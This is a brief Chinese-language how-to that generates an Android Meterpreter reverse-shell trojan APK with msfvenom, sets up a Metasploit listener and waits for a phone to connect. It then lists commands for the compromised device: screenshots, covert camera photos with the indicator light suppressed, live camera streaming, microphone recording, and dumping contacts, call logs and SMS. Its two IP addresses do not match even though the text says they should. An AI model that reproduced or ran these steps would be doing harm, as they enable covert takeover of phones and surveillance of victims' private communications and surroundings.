# 步骤
0. 首先得确保连接同一个wifi,处于同一个网络中
1. 创建一个apk
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.116 lport=9999 R > /root/520.apk
2. 开始操作
2.1. 启动msfconsole
msfconsole
2.2. 加载模块
use exploit/multi/handler
2.3. 选择Payload
set payload android/meterpreter/reverse_tcp
2.4. 这里的地址设置成我们刚才生成木马的IP地址
set lhost 192.168.0.199
2.5. 这里的端口设置成刚才我们生成木马所监听的端口
set lport 9999
2.6. 开始执行漏洞,开始监听,等待手机上线
exploit
3. 注意事项
3.1. 如果不自动跳转到meterpreter,那么肯定上面拼写错误了
3.2. sessions -l 是查看当前肉鸡触发的会话列表
3.3. sessions -i id 进入列表中的指定id
4. 重要技能
4.1. 屏幕截图
screenshot
4.2. 闪照
webcam_snap -i 1 // 后置摄像头闪照
webcam_snap -i 2 // 前置摄像头闪照
webcam_snap -i 2 -v false // 前置摄像头闪照且没有指示灯亮起
4.3. 通讯录下载
dump_contacts
4.4. 通话记录下载
dump_calllog
4.5. 短信下载
dump_sms
4.6. 监控摄像头
webcam_stream
输入上面命令后,会输出一个随机的xxx.html
之后直接在浏览器上面访问xxx.html就可以看到实时的场景了
4.7. 远程录音
record_mic -d 13